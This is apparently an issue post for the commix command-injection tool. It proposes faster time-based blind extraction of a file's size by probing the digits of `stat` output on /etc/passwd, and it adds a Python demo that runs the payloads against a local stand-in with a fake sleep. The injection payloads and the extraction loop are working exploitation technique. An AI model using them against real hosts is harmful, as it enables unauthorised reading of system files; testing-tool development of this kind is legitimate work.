Description
Hi,
I was running commix against a time-based vulnerable host and noticed that it took a lot of time to determine the size of a file when using --file-read. The problem is that it's using the increment technique (e.g. "Is the file size equal to 1? No. Is the file size equal to 2? No." etc.).
Check this Python pseudo-code, which illustrates an idea to improve the efficiency:
stat --printf="%s" /etc/passwd
-> 3671 (but it's blind, we don't see it directly)
file_length = ''
# exec(...).elapsed_time() stands for "send the payload through the injection point and time the response"
# Grab the number of digits of the "stat" output (e.g. 4 for "3671"): the target sleeps one second per digit
cmd_output_length = round(exec('out_length=$(stat --printf="%s" /etc/passwd) && sleep $(expr length "$out_length")').elapsed_time())
for i in range(cmd_output_length):
    # We iterate over each character of the "stat" output, and sleep accordingly to its value
    tts = round(exec(f'tts="$(stat --printf="%s" /etc/passwd | cut -c{i+1}-{i+1})" && sleep "$tts"').elapsed_time())  # tts = time to sleep
    file_length += str(tts)
# file_length = '3671'
It is not necessary to sleep 3 seconds for the digit 3; we can use the increment technique on each digit, as it may be faster too. The improvement resides in the "stat --printf="%s" /etc/passwd".
The time gained is considerable I think, compared to the current version:
str="$(echo $(cat /etc/passwd))"
str1=$(expr length "$str")
if [ 22 -ne $str1 ]
then sleep 0
else sleep 1
fi
I do not know the project enough to provide a PR, but I'd like to hear your thoughts about this idea!
NB: I also noticed that commix wasn't checking if the file existed, or if it was empty. I think this could be easily fixed too:
test -f file || sleep 1 # Sleep if the file does not exist (or is not a regular file)
[ -s file ] || sleep 1 # Sleep if the file is empty (or does not exist)
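As an added example (not the issue author's code and not part of commix), here is a runnable comparison of the three probing strategies discussed above: the per-digit sleep, the per-digit increment, and commix's current length increment, plus the two existence/emptiness checks. The "target" is a constructed stand-in for a time-based blind injection point: each payload runs in a real `sh`, but a shell function named `sleep` is prepended that records the requested seconds instead of pausing, so the recorded number plays the role of the measured delay and the run finishes instantly. It assumes a POSIX `sh` with `stat -c %s`, `cut` and `expr length` (GNU coreutils or busybox); `RecordingSleepOracle`, `make_sample_file` and the function names are this example's own.

```python
import os
import shlex
import subprocess
import tempfile


class RecordingSleepOracle:
    """Constructed stand-in for a time-based blind command injection point.

    The payload runs in a real /bin/sh, but a `sleep` shell function is
    prepended that writes its argument to a log instead of pausing. delay()
    returns that number, which plays the role of the measured response delay,
    so the extraction logic below is what one would run against a live target
    (with real timing swapped in) yet finishes instantly.
    """

    # Assumption of this example: shell functions shadow the `sleep` binary.
    FAKE_SLEEP = 'sleep() { printf "%s" "$1" > "$SLEEP_LOG"; }; '

    def __init__(self):
        self.log = os.path.join(tempfile.mkdtemp(prefix="oracle-"), "slept")
        self.queries = 0  # number of "requests" sent to the target

    def delay(self, payload):
        """Run one injected payload and return the seconds it asked to sleep."""
        self.queries += 1
        if os.path.exists(self.log):
            os.remove(self.log)
        env = dict(os.environ, SLEEP_LOG=self.log)
        subprocess.run(["sh", "-c", self.FAKE_SLEEP + payload], env=env,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if not os.path.exists(self.log):
            return 0  # sleep never ran: the command failed before reaching it
        with open(self.log) as f:
            return int(f.read().strip() or 0)


def file_exists(oracle, path):
    """The issue's `test -f file || sleep 1`: a delay means the file is missing."""
    return oracle.delay(f"test -f {shlex.quote(path)} || sleep 1") == 0


def file_nonempty(oracle, path):
    """The issue's `[ -s file ] || sleep 1`: a delay means empty or missing."""
    return oracle.delay(f"[ -s {shlex.quote(path)} ] || sleep 1") == 0


def _digit_count(oracle, q):
    # One query: the target sleeps one second per digit of the stat output.
    # Returns 0 if stat failed (e.g. missing file), since && skips the sleep.
    return oracle.delay(f'n=$(stat -c %s {q}) && sleep $(expr length "$n")')


def size_digit_sleep(oracle, path):
    """Proposed technique: one query per digit, delay == digit value."""
    q = shlex.quote(path)
    ndigits = _digit_count(oracle, q)
    if ndigits == 0:
        return None
    digits = ""
    for i in range(1, ndigits + 1):  # cut -c is 1-based
        digits += str(oracle.delay(f'd=$(stat -c %s {q} | cut -c{i}) && sleep "$d"'))
    return int(digits)


def size_digit_increment(oracle, path):
    """Variant from the issue: equality probes per digit (<= 10 each), 1s delays."""
    q = shlex.quote(path)
    ndigits = _digit_count(oracle, q)
    if ndigits == 0:
        return None
    digits = ""
    for i in range(1, ndigits + 1):
        for guess in range(10):
            probe = f'd=$(stat -c %s {q} | cut -c{i}) && [ "$d" -eq {guess} ] && sleep 1'
            if oracle.delay(probe):
                digits += str(guess)
                break
    return int(digits)


def size_length_increment(oracle, path, max_len=100):
    """Current commix probe quoted in the issue: one query per candidate length.
    Note it measures the length of the whitespace-collapsed content (echo $(cat)),
    which equals the byte size only for files without runs of whitespace."""
    q = shlex.quote(path)
    for n in range(1, max_len + 1):
        probe = (f'str="$(echo $(cat {q}))"; str1=$(expr length "$str"); '
                 f'if [ {n} -ne "$str1" ]; then sleep 0; else sleep 1; fi')
        if oracle.delay(probe):
            return n
    return None  # gave up: file larger than max_len or unreadable


def make_sample_file(nbytes):
    """Constructed sample target file of exactly nbytes bytes."""
    fd, path = tempfile.mkstemp(prefix="target-")
    with os.fdopen(fd, "wb") as f:
        f.write(b"A" * nbytes)
    return path


if __name__ == "__main__":
    big = make_sample_file(3671)  # same size as the /etc/passwd in the issue
    for name, fn in (("per-digit sleep", size_digit_sleep),
                     ("per-digit increment", size_digit_increment)):
        o = RecordingSleepOracle()
        print(f"{name}: size={fn(o, big)} queries={o.queries}")
    o = RecordingSleepOracle()
    print(f"length increment on 42-byte file: size="
          f"{size_length_increment(o, make_sample_file(42))} queries={o.queries}")
```

On the 3671-byte file the per-digit sleep needs 5 queries (17 seconds of total delay on a real target), the per-digit increment needs 22 one-second queries, and the current length increment would need 3671 queries; the query count, not the per-query delay, is what dominates over a real network, so both digit-based variants are large wins. The `None` returns cover the failure mode the issue raises: a missing file makes `stat` fail, `&&` skips the `sleep`, and the digit-count query comes back with no delay, which should be detected rather than extracted as an empty size.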